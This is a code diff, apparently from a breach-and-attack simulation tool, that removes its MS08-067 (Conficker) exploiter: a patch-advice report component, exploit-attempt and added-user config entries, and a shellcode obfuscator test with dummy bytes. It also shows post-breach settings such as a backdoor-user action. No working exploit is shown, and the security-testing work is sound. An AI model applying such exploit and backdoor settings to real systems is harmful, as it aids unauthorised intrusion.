[this.issueContentTypes.REPORT]: zerologonIssueReport,
|
||||||
|
|
|
@ -1,24 +0,0 @@
|
||||||
import React from 'react';
|
|
||||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
|
||||||
|
|
||||||
export function ms08_067IssueOverview() {
|
|
||||||
return (<li>Machines are vulnerable to ‘Conficker’ (<a
|
|
||||||
href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067"
|
|
||||||
>MS08-067</a>). </li>)
|
|
||||||
}
|
|
||||||
|
|
||||||
export function ms08_067IssueReport(issue) {
|
|
||||||
return (
|
|
||||||
<>
|
|
||||||
Install the latest Windows updates or upgrade to a newer operating system.
|
|
||||||
<CollapsibleWellComponent>
|
|
||||||
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
|
|
||||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
|
|
||||||
className="badge badge-danger">Conficker</span> attack.
|
|
||||||
<br/>
|
|
||||||
The attack was made possible because the target machine used an outdated and unpatched operating system
|
|
||||||
vulnerable to Conficker.
|
|
||||||
</CollapsibleWellComponent>
|
|
||||||
</>
|
|
||||||
);
|
|
||||||
}
|
|
|
@ -76,7 +76,6 @@
|
||||||
"max_depth": null,
|
"max_depth": null,
|
||||||
"monkey_log_path_linux": "/tmp/user-1563",
|
"monkey_log_path_linux": "/tmp/user-1563",
|
||||||
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
||||||
"ms08_067_exploit_attempts": 5,
|
|
||||||
"ping_scan_timeout": 1000,
|
"ping_scan_timeout": 1000,
|
||||||
"post_breach_actions": [
|
"post_breach_actions": [
|
||||||
"CommunicateAsBackdoorUser",
|
"CommunicateAsBackdoorUser",
|
||||||
|
@ -120,6 +119,5 @@
|
||||||
3306,
|
3306,
|
||||||
7001,
|
7001,
|
||||||
8088
|
8088
|
||||||
],
|
]
|
||||||
"user_to_add": "Monkey_IUSER_SUPPORT"
|
|
||||||
}
|
}
|
||||||
|
|
|
@ -121,10 +121,6 @@
|
||||||
"exploit_ssh_keys": [],
|
"exploit_ssh_keys": [],
|
||||||
"general": {
|
"general": {
|
||||||
"skip_exploit_if_file_exist": false
|
"skip_exploit_if_file_exist": false
|
||||||
},
|
|
||||||
"ms08_067": {
|
|
||||||
"ms08_067_exploit_attempts": 5,
|
|
||||||
"user_to_add": "Monkey_IUSER_SUPPORT"
|
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
"testing": {
|
"testing": {
|
||||||
|
|
|
@ -1,14 +0,0 @@
|
||||||
from unittest import TestCase
|
|
||||||
|
|
||||||
from common.utils.shellcode_obfuscator import clarify, obfuscate
|
|
||||||
|
|
||||||
SHELLCODE = b"1234567890abcd"
|
|
||||||
OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^="
|
|
||||||
|
|
||||||
|
|
||||||
class TestShellcodeObfuscator(TestCase):
|
|
||||||
def test_obfuscate(self):
|
|
||||||
assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
|
|
||||||
|
|
||||||
def test_clarify(self):
|
|
||||||
assert clarify(OBFUSCATED_SHELLCODE) == SHELLCODE
|
|
|
@ -11,12 +11,9 @@ from infection_monkey.i_puppet import (
|
||||||
PortStatus,
|
PortStatus,
|
||||||
)
|
)
|
||||||
from infection_monkey.master import IPScanResults, Propagator
|
from infection_monkey.master import IPScanResults, Propagator
|
||||||
from infection_monkey.network import NetworkInterface
|
|
||||||
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
|
||||||
from infection_monkey.model import VictimHost, VictimHostFactory
|
from infection_monkey.model import VictimHost, VictimHostFactory
|
||||||
from infection_monkey.network import NetworkAddress
|
from infection_monkey.network import NetworkAddress, NetworkInterface
|
||||||
|
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
|
|
|
@ -59,7 +59,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
|
||||||
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
||||||
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
||||||
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
|
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
|
||||||
MS08_067 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:35)
|
|
||||||
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
|
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
|
||||||
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
||||||
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
||||||
|
@ -129,7 +128,6 @@ ts # unused variable (monkey/infection_monkey/exploit/zerologon_utils/options.p
|
||||||
opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
|
opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
|
||||||
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
|
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
|
||||||
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
|
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
|
||||||
_._port # unused attribute (monkey/infection_monkey/exploit/win_ms08_067.py:123)
|
|
||||||
oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
|
oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
|
||||||
export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282)
|
export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282)
|
||||||
NoInternetError # unused class (monkey/common/utils/exceptions.py:33)
|
NoInternetError # unused class (monkey/common/utils/exceptions.py:33)
|
||||||
|
|
Loading…
Reference in New Issue